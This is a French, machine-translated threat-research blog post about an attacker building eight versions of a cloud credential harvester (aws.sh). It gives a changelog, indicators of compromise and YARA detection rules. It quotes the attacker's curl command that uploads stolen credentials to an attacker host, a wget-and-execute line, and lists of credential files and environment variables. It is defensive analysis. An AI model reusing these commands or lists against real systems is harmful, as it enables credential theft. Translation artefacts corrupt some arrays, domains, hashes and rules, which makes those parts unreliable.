Les développeurs ne sont pas les seuls à avoir adopté la méthodologie agile pour leurs processus de développement. Du 2023-06-15 au 2023-07-11, l’équipe p0 Labs de Permiso Security a identifié et suivi un attaquant développant et déployant huit (8) itérations incrémentielles de son logiciel malveillant de collecte d’informations d’identification tout en continuant à développer une infrastructure pour un prochain (spoiler : maintenant lancé ) campagne ciblant divers services cloud.
Alors que la semaine dernière Aqua Security publié un blog détaillant les étapes de cette campagne en sous-développement liées aux images Docker infectées, aujourd’hui Permiso p0 Labs et Laboratoires Sentinelles publient une recherche conjointe mettant en évidence les mises à jour incrémentielles des échantillons de logiciels malveillants de collecte d’informations d’identification cloud systématiquement collectés en surveillant l’infrastructure de l’attaquant. Alors sortez de vos sièges et profitez de ce stand-up scrum meeting dédié au partage des connaissances sur cette campagne d’acteurs et les outils qu’ils utiliseront pour voler plus d’identifiants cloud.
Si vous aimez les captures d’écran IDA dans vos blogs d’analyse, n’oubliez pas de consulter Laboratoires Sentinelles‘ Engagez-vous dans cette campagne !
Campagnes précédentes
Il y a eu de nombreuses campagnes dans lesquelles les acteurs ont utilisé des outils similaires pour effectuer la récupération d’informations d’identification dans le cloud tout en déployant en masse un logiciel de crypto mining. Pour rappel, en décembre, l’équipe Permiso a rapporté les détails d’un acteur ciblant le public face aux Juptyer Notebooks avec cet ensemble d’outils.
Nos amis de Cado ont également fait de nombreux reportages sur campagnes précédentes.
Campagne active
Le 11/07/2023, alors que nous préparions la sortie de ce blog sur l’ensemble d’outils en développement, l’acteur a lancé sa campagne.
Le fichier b.sh est le script d’initialisation qui télécharge et déploie toutes les fonctionnalités de la suite d’outils. Les principales fonctionnalités consistent à installer une porte dérobée pour un accès continu, à déployer des utilitaires de crypto-minage et à rechercher et à se propager à d’autres systèmes vulnérables.
Actuellement (2023-07-12), il y a 39 systèmes compromis dans cette campagne :
Quoi de neuf?
Les utilitaires de collecte d’informations d’identification cloud de cette campagne présentent des différences notables par rapport aux versions précédentes. Voici les points saillants des modifications :
- Prise en charge multi-cloud:
- Prise en charge de GCP ajoutée
- GCLOUD_CREDS_FILES=(« config_sentinel »https://thehackernews.com/2023/08/ »gce »https://thehackernews.com/2023/08/ ».last_survey_prompt.yaml »https://thehackernews.com/2023/08 / »config_default »https://thehackernews.com/2023/08/ »active_config »https://thehackernews.com/2023/08/ »credentials.db »https://thehackernews.com/2023/08/ »access_tokens .db »https://thehackernews.com/2023/08/ ».last_update_check.json »https://thehackernews.com/2023/08/ ».last_opt_in_prompt.yaml »https://thehackernews.com/2023/08 / ».feature_flags_config.yaml »https://thehackernews.com/2023/08/ »adc.json »https://thehackernews.com/2023/08/ »resource.cache »)
- Prise en charge Azure ajoutée en recherchant et en extrayant les informations d’identification de tous les fichiers nommés azure.json
- De nombreux changements structurels et syntaxiques soulignent le passage du ciblage AWS au multi-cloud :
- Tableaux de noms de fichiers sensibles répartis par service cloud :
- CRED_FILE_NAMES → AWS_CREDS_FILES, AZURE_CREDS_FILES et GCLOUD_CREDS_FILES
- Noms de fonctions génériques :
- send_aws_data → send_data
- En-têtes de section de sortie modifiés :
- INFOS → INFOS AWS
- IAM → DONNÉES UTILISATEUR IAM
- EC2 → DONNÉES UTILISATEUR EC2
- Fichiers ciblés: Ajout de « kubeconfig »https://thehackernews.com/2023/08/ »adc.json »https://thehackernews.com/2023/08/ »azure.json »https://thehackernews.com/2023/08 / »clusters.conf »https://thehackernews.com/2023/08/ »docker-compose.yaml »https://thehackernews.com/2023/08/ ».env » à la variable CRED_FILE_NAMES. redis.conf.not.exist ajouté avec une variable MIXED_CREDFILES.
- Nouvelle boucle: Passage de la fonction dload (« curl sans curl ») au téléchargement du binaire curl par étapes pour éventuellement utiliser le binaire curl natif.
- AWS-CLI: aws sts get-caller-identity pour valider les informations d’identification cloud et les informations d’identité
- Infrastructure: La plupart des campagnes précédentes hébergeaient les utilitaires et C2 sur un seul domaine. Dans cette campagne, l’acteur utilise plusieurs noms de domaine complets (y compris une mascarade remarquable en tant qu’instance EC2 : ap-northeast-1.compute.internal.anondns[.]filet).
- De nombreux éléments de l’infrastructure et du code de l’acteur donnent du poids au fait que l’auteur est de langue maternelle allemande (en plus du fait que l’outil open source TeamTNT contient déjà de nombreux éléments allemands dans son code).
- L’une des versions intermédiaires d’aws.sh faisait référence au FQDN ap-northeast-1.compute.internal.anondns[.]net , qui a renvoyé le message d’erreur allemand Fehler! vergleiche bitte die Authentifizierungsmerkmale in beiden Scripten!!! (qui se traduit par une erreur ! Veuillez comparer les fonctionnalités d’authentification dans les deux scripts !) lors de la visite d’un scan VirusTotal le 2023-06-23 :
- Une recherche Google du message d’erreur ci-dessus révèle un seul résultat provenant d’un forum allemand du 08/10/2008 (https://administrator.de/tutorial/upload-von-dateien-per-batch-curl-und-php-auf-einen-webserver-ohne-ftp-98399.html) contenant le code d’un téléchargeur de fichiers PHP appelé upload.php où l’échec de l’authentification sinon bloque l’écho de la déclaration d’erreur exacte. Le nom de fichier upload.php était également l’URI des versions 2 et 3 d’aws.sh de l’acteur menaçant, et la commande curl de l’attaquant (illustré ci-dessous) contient une syntaxe d’argument unique identique à l’exemple de commande dans le même message du forum.
- Les derniers hochements de tête allemands sont dans les arguments de la commande curl. L’indicateur le plus flagrant est l’argument Datei= dans les versions 2 à 8 d’aws.sh puisque « Datei » est le mot allemand pour « fichier ». L’observation la plus subtile concerne le mot de passe codé en dur (oeireopüigreigroei) dans les versions 2 et 3 d’aws.sh, notamment la présence du seul caractère non latin : ü.
send_data()
curl -F "username=jegjrlgjhdsgjh" -F "password=oeireopüigreigroei" -F \
"Datei=@"$CSOF"" -F "Send=1" <https://everlost.anondns.net/upload.php>
Le nom d’utilisateur et le mot de passe indiquent tous deux une exécution du clavier – le nom d’utilisateur sur les touches de la ligne d’accueil et le mot de passe sur les touches de la ligne supérieure. Cependant, tous les autres caractères étant latins, le scénario probable qui produirait un seul ü est l’utilisation d’un clavier virtuel. Étant donné que le ü suit immédiatement la lettre p dans le mot de passe, les deux seules configurations de clavier virtuel contenant un ü adjacent au caractère p concernent les langues estonienne et allemande.
Cycle de vie du développement des attaquants
La surveillance de cette infrastructure d’attaquant pendant un mois a permis à l’équipe Permiso d’avoir un aperçu du processus de développement de l’acteur et des modifications apportées à chaque itération. Quelle meilleure façon de s’afficher qu’avec un journal des modifications ! Ce qui suit est un journal des modifications des mises à jour incrémentielles apportées à l’utilitaire de collecte d’informations d’identification aws.sh :
# v1(28165d28693ca807fb3d4568624c5ba9) -> v2(b9113ccc0856e5d44bab8d3374362a06)
[*] updated function name from int_main() to run_aws_grabber() (though not executed in script)
[*] updated function name from send_aws_data() to send_data()
[*] updated function name from files_aws() to cred_files()
[*] updated function name from docker_aws() to get_docker() with similar functionality
[*] split env_aws() function's logic into three (3) new functions: get_aws_infos(), get_aws_meta(), get_aws_env()
[+] added function get_awscli_data() which executes aws sts get-caller-identity command
[+] added two (2) functions with new functionality (returning contents of sensitive file names and environment variables): get_azure(), get_google()
[-] removed strings_proc_aws function containing strings /proc/*/env* | sort -u | grep 'AWS|AZURE|KUBE' command enumerating environment variables
[-] removed ACF file name array (though all values except .npmrc, cloud and credentials.gpg were already duplicated in CRED_FILE_NAMES array)
[+] added new empty AZURE_CREDS_FILES file name array (though not used in script)
[+] added new AWS_CREDS_FILES file name array (though not used in script) with the following values moved from CRED_FILE_NAMES file name array: credentials, .s3cfg, .passwd-s3fs, .s3backer_passwd, .s3b_config, s3proxy.conf
[+] added new GCLOUD_CREDS_FILES file name array (though not used in script) with the following net new values: config_sentinel, gce, .last_survey_prompt.yaml, config_default, active_config, credentials.db, .last_update_check.json, .last_opt_in_prompt.yaml, .feature_flags_config.yaml, resource.cache
[+] added copy of duplicate values access_tokens.db and adc.json from CRED_FILE_NAMES file name array to GCLOUD_CREDS_FILES file name array
[+] added netrc, kubeconfig, adc.json, azure.json, env, clusters.conf, grafana.ini and an empty string to CRED_FILE_NAMES file name array
[-] removed credentials.db from CRED_FILE_NAMES file name array
[-] removed dload function (downloader capability, i.e. "curl without curl")
[+] added commented dload function invocation for posting final results
[+] added commented wget command to download and execute https://everlost.anondns[.]net/cmd/tmate.sh
[*] replaced execution of dload function with native curl binary
[*] replaced references to /tmp/.curl with native curl binary
[-] removed base64 encoding of final results
[+] added username and password to curl command: "username=jegjrlgjhdsgjh"https://thehackernews.com/2023/08/"password=oeireopüigreigroei"
[*] updated URI for posting final results from /in.php?base64=$SEND_B64_DATA to /upload.php
[*] renamed LOCK_FILE from /tmp/...aws4 to /tmp/..a.l$(echo $RANDOM)
[-] removed rm -f $LOCK_FILE command
[-] removed history -cw command (clear history list and overwrite history file) at end of script
[*] converted numerous long commands into shorter multi-line syntax-------
# v2(b9113ccc0856e5d44bab8d3374362a06) -> v3(d9ecceda32f6fa8a7720e1bf9425374f)
[+] added execution of previously unused run_aws_grabber() function
[+] added function get_prov_vars with nearly identical strings /proc/*/env* command found in previously removed strings_proc_aws function (though with previous grep 'AWS|AZURE|KUBE' command removed)
[+] added logic to search for files listed in previously unused file name arrays: AWS_CREDS_FILES, GCLOUD_CREDS_FILES
[+] added new file name array MIXED_CREDFILES=("redis.conf") (though not used in script)
[+] added docker-compose.yaml to CRED_FILE_NAMES file name array
[*] updated env to .env in CRED_FILE_NAMES file name array
[-] removed config from AWS_CREDS_FILES file name array
[*] updated echo output section header from INFO to AWS INFO
[*] updated echo output section header from IAM to IAM USERDATA
[*] updated echo output section header from EC2 to EC2 USERDATA
[-] removed commented dload function invocation for posting final results
-------
# v3(d9ecceda32f6fa8a7720e1bf9425374f) -> v4(0855b8697c6ebc88591d15b954bcd15a)
[*] replaced strings /proc/*/env* command with cat /proc/*/env* command in get_prov_vars function
[*] updated username and password to curl command from "username=jegjrlgjhdsgjh"https://thehackernews.com/2023/08/"password=oeireopüigreigroei" to "username=1234" -F "password=5678"
[*] updated FQDN for posting final results from everlost.anondns[.]net to ap-northeast-1.compute.internal.anondns[.]net (masquerading as AWS EC2 instance FQDN)
[*] updated URI for posting final results from /upload.php to /insert/keys.php
-------
# v4(0855b8697c6ebc88591d15b954bcd15a) -> v5(f7df739f865448ac82da01b3b1a97041)
[*] updated FQDN for posting final results from ap-northeast-1.compute.internal.anondns[.]net to silentbob.anondns[.]net
[+] added SRCURL variable to store FQDN (later expanded in final curl command's URL)
[+] added if type aws logic to only execute run_aws_grabber function if AWS CLI binary is present
-------
# v5(f7df739f865448ac82da01b3b1a97041) -> v6(1a37f2ef14db460e5723f3c0b7a14d23)
[*] updated redis.conf to redis.conf.not.exist in MIXED_CREDFILES file name array
[*] updated LOCK_FILE variable from /tmp/..a.l$(echo $RANDOM) to /tmp/..a.l
-------
# v6(1a37f2ef14db460e5723f3c0b7a14d23) -> v7(99f0102d673423c920af1abc22f66d4e)
[-] removed grafana.ini from CRED_FILE_NAMES file name array
-------
# v7(99f0102d673423c920af1abc22f66d4e) -> v8(5daace86b5e947e8b87d8a00a11bc3c5)
[-] removed MIXED_CREDFILES file name array
[+] added new file name array DBS_CREDFILES=("postgresUser.txt"https://thehackernews.com/2023/08/"postgresPassword.txt")
[+] added awsAccessKey.txt and awsKey.txt to AWS_CREDS_FILES file name array
[+] added azure.json to AZURE_CREDS_FILES file name array (already present in CRED_FILE_NAMES file name array)
[+] added hostname command output to final result
[+] added curl -sLk ipv4.icanhazip.com -o- command output to final result
[+] added cat /etc/ssh/sshd_config | grep 'Port '|awk 'print $2' command output to final result
[*] updated LOCK_FILE variable from /tmp/..a.l to /tmp/..pscglf_
Infrastructure de l’attaquant
Les acteurs utilisant TeamTNT Tooling modifié comme celui-ci ont tendance à utiliser le service d’hébergement Nice VPS. Cette campagne ne fait pas exception à cet égard. L’acteur a enregistré au moins quatre (4) domaines pour cette campagne via anondns, tous sauf un pointant actuellement vers l’adresse IP du VPS de Nice 45.9.148.108. Le domaine everfound.anondns.net est actuellement résolu par l’adresse IP 207.154.218.221.
Les domaines actuellement concernés par cette campagne sont :
Domaine | Vu la première fois |
|---|---|
everlost.anondns[.]filet | 2023-06-11 10:35:09 UTC |
ap-northeast-1.compute.internal.anondns[.]filet | 2023-06-16 15:24:16 UTC |
silentbob.anondns[.]filet | 2023-06-24 16:53:46 UTC |
jamais trouvé.anondns[.]filet | 2023-07-02 21:07:50 UTC |
Alors que la majorité des récentes activités de développement d’attaquants ont eu lieu sur Silentbob.anondns.net, nous trouvons que le domaine de mascarade AWS ap-northeast-1.compute.internal.anondns.net est le plus intéressant, mais Jay et Silent Bob font beaucoup. une meilleure couverture de blog afin que nous respections le choix de l’attaquant dans les noms de domaine complets.
Indicateurs
| Indicateur | Taper | Remarques |
|---|---|---|
| everlost.anondns[.]filet | Domaine | |
| ap-northeast-1.compute.internal.anondns[.]filet | Domaine | |
| silentbob.anondns[.]filet | Domaine | |
| jamais trouvé.anondns[.]filet | Domaine | |
| 207.154.218[.]221 | IPv4 | |
| 45.9.148[.]108 | IPv4 | |
| 28165d28693ca807fb3d4568624c5ba9 | MD5 | aws.sh v1 |
| b9113ccc0856e5d44bab8d3374362a06 | MD5 | aws.sh v2 |
| d9ecceda32f6fa8a7720e1bf9425374f | MD5 | aws.sh v3 |
| 0855b8697c6ebc88591d15b954bcd15a | MD5 | aws.sh v4 |
| f7df739f865448ac82da01b3b1a97041 | MD5 | aws.sh v5 |
| 1a37f2ef14db460e5723f3c0b7a14d23 | MD5 | aws.sh v6 |
| 99f0102d673423c920af1abc22f66d4e | MD5 | aws.sh v7 |
| 5daace86b5e947e8b87d8a00a11bc3c5 | MD5 | aws.sh v8 (grab.sh) |
| 92d6cc158608bcec74cf9856ab6c94e5 | MD5 | utilisateur.sh |
| cfb6d7788c94857ac5e9899a70c710b6 | MD5 | int.sh |
| 7044a31e9cd7fdbf10e6beba08c78c6b | MD5 | nettoyer.sh |
| 58b92888443cfb8a4720645dc3dc9809 | MD5 | xc3.sh |
| f60b75dsourd9703277bb2dc36c0f114b | MD5 | b.sh (script d’installation) |
| 2044446e6832577a262070806e9bf22c | MD5 | chat |
| c2465e78a5d11afd74097734350755a4 | MD5 | curl.full |
| f13b8eedde794e2a9a1e87c3a2b79bf4 | MD5 | tmate.sh |
| 87c8423e0815d6467656093bff9aa193 | MD5 | un |
| 9e174082f721092508df3f1aae3d6083 | MD5 | exécuter.sh |
| 203fe39ff0e59d683b36d056ad64277b | MD5 | analyse de masse |
| 2514cff4dbfd6b9099f7c83fc1474a2d | MD5 | |
| dafac2bc01806db8bf19ae569d85deae | MD5 | données.sh |
| 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U | Portefeuille | |
| hxxp://silentbob.anondns.net/insert/metadata.php | URL |
Détections
rule P0_Hunting_AWS_CredFileNames_1
meta:
description = "Detecting presence of scripts searching for numerous AWS credential file names"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "3e2cddf76334529a14076c3659a68d92"
md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_04 = "28165d28693ca807fb3d4568624c5ba9"
md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
md5_06 = "f7df739f865448ac82da01b3b1a97041"
md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_08 = "99f0102d673423c920af1abc22f66d4e"
md5_09 = "99f0102d673423c920af1abc22f66d4e"
md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$credFileAWS_01 = "credentials"
$credFileAWS_02 = ".s3cfg"
$credFileAWS_03 = ".passwd-s3fs"
$credFileAWS_04 = ".s3backer_passwd"
$credFileAWS_05 = ".s3b_config"
$credFileAWS_06 = "s3proxy.conf"
$credFileAWS_07 = "awsAccessKey.txt"
$credFileAWS_08 = "awsKey.txts"
$fileSearchCmd = "find "
$fileAccessCmd_01 = "cat "
$fileAccessCmd_02 = "strings "
$fileAccessCmd_03 = "cp "
$fileAccessCmd_04 = "mv "
condition:
(3 of ($credFileAWS*)) and $fileSearchCmd and (any of ($fileAccessCmd*))
rule P0_Hunting_AWS_EnvVarNames_1 {
meta:
description = "Detecting presence of scripts searching for numerous environment variables containing sensitive AWS credential information. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "3e2cddf76334529a14076c3659a68d92"
md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_04 = "28165d28693ca807fb3d4568624c5ba9"
md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
md5_06 = "f7df739f865448ac82da01b3b1a97041"
md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_08 = "99f0102d673423c920af1abc22f66d4e"
md5_09 = "99f0102d673423c920af1abc22f66d4e"
md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$shellHeader_01 = "#!/bin/sh"
$shellHeader_02 = "#!/bin/bash"
$envVarAWSPrefixSyntax_01 = "$AWS_"
$envVarAWSPrefixSyntax_02 = "$AWS_"
$envVarAWS_01 = "AWS_ACCESS_KEY_ID"
$envVarAWS_02 = "AWS_SECRET_ACCESS_KEY"
$envVarAWS_03 = "AWS_SESSION_TOKEN"
$envVarAWS_04 = "AWS_SHARED_CREDENTIALS_FILE"
$envVarAWS_05 = "AWS_CONFIG_FILE"
$envVarAWS_06 = "AWS_DEFAULT_REGION"
$envVarAWS_07 = "AWS_REGION"
$envVarAWS_08 = "AWS_EC2_METADATA_DISABLED"
$envVarEcho = "then echo "
$linPEAS_01 = "#-------) Checks pre-everything (---------#"
$linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
condition:
(any of ($shellHeader*)) and (1 of ($envVarAWSPrefixSyntax*)) and (4 of ($envVarAWS*)) and (#envVarEcho >= 4) and not (all of ($linPEAS*))
rule P0_Hunting_AWS_SedEnvVarExtraction_1
meta:
description = "Detecting presence of scripts using native sed (Stream Editor) utility extracting numerous environment variables containing sensitive AWS credential information"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "3e2cddf76334529a14076c3659a68d92"
md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_04 = "28165d28693ca807fb3d4568624c5ba9"
md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
md5_06 = "f7df739f865448ac82da01b3b1a97041"
md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_08 = "99f0102d673423c920af1abc22f66d4e"
md5_09 = "99f0102d673423c920af1abc22f66d4e"
md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$grepPropAWS = "
rule P0_Hunting_Azure_EnvVarNames_1 {
meta:
description = "Detecting presence of scripts searching for numerous environment variables containing sensitive Azure credential information"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
md5_04 = "f7df739f865448ac82da01b3b1a97041"
md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "99f0102d673423c920af1abc22f66d4e"
md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$envVarAzurePrefixSyntax_01 = "$AZURE_"
$envVarAzurePrefixSyntax_02 = "$AZURE_"
$envVarAzure_01 = "AZURE_CREDENTIAL_FILE"
$envVarAzure_02 = "AZURE_GUEST_AGENT_CONTAINER_ID"
$envVarAzure_03 = "AZURE_CLIENT_ID"
$envVarAzure_04 = "AZURE_CLIENT_SECRET"
$envVarAzure_05 = "AZURE_TENANT_ID"
$envVarAzure_06 = "AZURE_SUBSCRIPTION_ID"
$envVarEcho = "then echo "
condition:
(1 of ($envVarAzurePrefixSyntax*)) and (3 of ($envVarAzure*)) and (#envVarEcho >= 3)
rule P0_Hunting_GCP_CredFileNames_1
meta:
description = "Detecting presence of scripts searching for numerous Google Cloud Platform (GCP) credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
md5_04 = "f7df739f865448ac82da01b3b1a97041"
md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "99f0102d673423c920af1abc22f66d4e"
md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$shellHeader_01 = "#!/bin/sh"
$shellHeader_02 = "#!/bin/bash"
$credFileGCP_01 = "active_config"
$credFileGCP_02 = "gce"
$credFileGCP_03 = ".last_survey_prompt.yaml"
$credFileGCP_04 = ".last_opt_in_prompt.yaml"
$credFileGCP_05 = ".last_update_check.json"
$credFileGCP_06 = ".feature_flags_config.yaml"
$credFileGCP_07 = "config_default"
$credFileGCP_08 = "config_sentinel"
$credFileGCP_09 = "credentials.db"
$credFileGCP_10 = "access_tokens.db"
$credFileGCP_11 = "adc.json"
$credFileGCP_12 = "resource.cache"
$fileSearchCmd = "find "
$fileAccessCmd_01 = "cat "
$fileAccessCmd_02 = "strings "
$fileAccessCmd_03 = "cp "
$fileAccessCmd_04 = "mv "
$linPEAS_01 = "#-------) Checks pre-everything (---------#"
$linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
condition:
(any of ($shellHeader*)) and (5 of ($credFileGCP*)) and $fileSearchCmd and (any of ($fileAccessCmd*)) and not (all of ($linPEAS*))
rule P0_Hunting_GCP_EnvVarNames_1 {
meta:
description = "Detecting presence of scripts searching for numerous environment variables containing sensitive GCP credential information"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
md5_04 = "f7df739f865448ac82da01b3b1a97041"
md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "99f0102d673423c920af1abc22f66d4e"
md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$shellHeader_01 = "#!/bin/sh"
$shellHeader_02 = "#!/bin/bash"
$envVarGCPPrefixSyntax_01 = "$GOOGLE_"
$envVarGCPPrefixSyntax_02 = "$GOOGLE_"
$envVarGCP_01 = "GOOGLE_API_KEY"
$envVarGCP_02 = "GOOGLE_DEFAULT_CLIENT_ID"
$envVarGCP_03 = "GOOGLE_DEFAULT_CLIENT_SECRET"
$envVarEcho = "then echo "
condition:
(any of ($shellHeader*)) and (1 of ($envVarGCPPrefixSyntax*)) and (2 of ($envVarGCP*)) and (#envVarEcho >= 2)
rule P0_Hunting_Common_CredFileNames_1
meta:
description = "Detecting presence of scripts searching for numerous common credential file names. Explicitly excluding LinPEAS (and its variants) to remove noise since it is already well-detected."
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "3e2cddf76334529a14076c3659a68d92"
md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_04 = "28165d28693ca807fb3d4568624c5ba9"
md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
md5_06 = "f7df739f865448ac82da01b3b1a97041"
md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_08 = "99f0102d673423c920af1abc22f66d4e"
md5_09 = "99f0102d673423c920af1abc22f66d4e"
md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$shellHeader_01 = "#!/bin/sh"
$shellHeader_02 = "#!/bin/bash"
$credFileCommon_01 = "authinfo2"
$credFileCommon_02 = "access_tokens.db"
$credFileCommon_03 = ".smbclient.conf"
$credFileCommon_04 = ".smbcredentials"
$credFileCommon_05 = ".samba_credentials"
$credFileCommon_06 = ".pgpass"
$credFileCommon_07 = "secrets"
$credFileCommon_08 = ".boto"
$credFileCommon_09 = "netrc"
$credFileCommon_10 = ".git-credentials"
$credFileCommon_11 = "api_key"
$credFileCommon_12 = "censys.cfg"
$credFileCommon_13 = "ngrok.yml"
$credFileCommon_14 = "filezilla.xml"
$credFileCommon_15 = "recentservers.xml"
$credFileCommon_16 = "queue.sqlite3"
$credFileCommon_17 = "servlist.conf"
$credFileCommon_18 = "accounts.xml"
$credFileCommon_19 = "kubeconfig"
$credFileCommon_20 = "adc.json"
$credFileCommon_21 = "clusters.conf"
$credFileCommon_22 = "docker-compose.yaml"
$credFileCommon_23 = ".env"
$fileSearchCmd = "find "
$fileAccessCmd_01 = "cat "
$fileAccessCmd_02 = "strings "
$fileAccessCmd_03 = "cp "
$fileAccessCmd_04 = "mv "
$linPEAS_01 = "#-------) Checks pre-everything (---------#"
$linPEAS_02 = "--) FAST - Do not check 1min of procceses and su brute"
condition:
(any of ($shellHeader*)) and (10 of ($credFileCommon*)) and $fileSearchCmd and (any of ($fileAccessCmd*)) and not (all of ($linPEAS*))
rule P0_Hunting_Common_TeamTNT_CredHarvesterOutputBanner_1
meta:
description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing specific section banner output commands"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "b9113ccc0856e5d44bab8d3374362a06"
md5_02 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_03 = "0855b8697c6ebc88591d15b954bcd15a"
md5_04 = "f7df739f865448ac82da01b3b1a97041"
md5_05 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "99f0102d673423c920af1abc22f66d4e"
md5_08 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$sectionBanner_01 = "-------- AWS INFO ------------------------------------------"
$sectionBanner_02 = "-------- EC2 USERDATA -------------------------------------------"
$sectionBanner_03 = "-------- GOOGLE DATA --------------------------------------"
$sectionBanner_04 = "-------- AZURE DATA --------------------------------------"
$sectionBanner_05 = "-------- IAM USERDATA -------------------------------------------"
$sectionBanner_06 = "-------- AWS ENV DATA --------------------------------------"
$sectionBanner_07 = "-------- PROC VARS -----------------------------------"
$sectionBanner_08 = "-------- DOCKER CREDS -----------------------------------"
$sectionBanner_09 = "-------- CREDS FILES -----------------------------------"
condition:
(5 of them)
rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_1 {
meta:
description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo for 'CREFILE' variable name (assuming intended name is 'CREDFILE' since it is iterating file names in input array"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "3e2cddf76334529a14076c3659a68d92"
md5_02 = "b9113ccc0856e5d44bab8d3374362a06"
md5_03 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_04 = "28165d28693ca807fb3d4568624c5ba9"
md5_05 = "0855b8697c6ebc88591d15b954bcd15a"
md5_06 = "f7df739f865448ac82da01b3b1a97041"
md5_07 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_08 = "99f0102d673423c920af1abc22f66d4e"
md5_09 = "99f0102d673423c920af1abc22f66d4e"
md5_10 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$varNameTypo = "for CREFILE in $"
$findArgs = "find / -maxdepth "
$xargs = "https://thehackernews.com/2023/08/" xargs -I % sh -c 'echo :::%; cat %' >> $"
condition:
all of them
rule P0_Hunting_Common_TeamTNT_CredHarvesterTypo_2
meta:
description = "Detecting presence of known credential harvester scripts (commonly used by TeamTNT) containing common typo for 'get_prov_vars' function name (assuming intended name is 'get_proc_vars' since it is outputting process variables"
author = "[email protected] (@danielhbohannon)"
date = "2023-07-12"
reference = "https://permiso.io/blog/s/agile-approach-to-mass-cloud-cred-harvesting-and-cryptomining/"
md5_01 = "d9ecceda32f6fa8a7720e1bf9425374f"
md5_02 = "0855b8697c6ebc88591d15b954bcd15a"
md5_03 = "f7df739f865448ac82da01b3b1a97041"
md5_04 = "1a37f2ef14db460e5723f3c0b7a14d23"
md5_05 = "99f0102d673423c920af1abc22f66d4e"
md5_06 = "99f0102d673423c920af1abc22f66d4e"
md5_07 = "5daace86b5e947e8b87d8a00a11bc3c5"
strings:
$funcNameTypo = "get_prov_vars"
$fileAccess_01 = "cat "
$fileAccess_02 = "strings "
$envVarFilePath = " /proc/*/env*"
condition:
$funcNameTypo and (any of ($fileAccess*)) and $envVarFilePath
rule P0_Hunting_Common_TeamTNT_CurlArgs_1
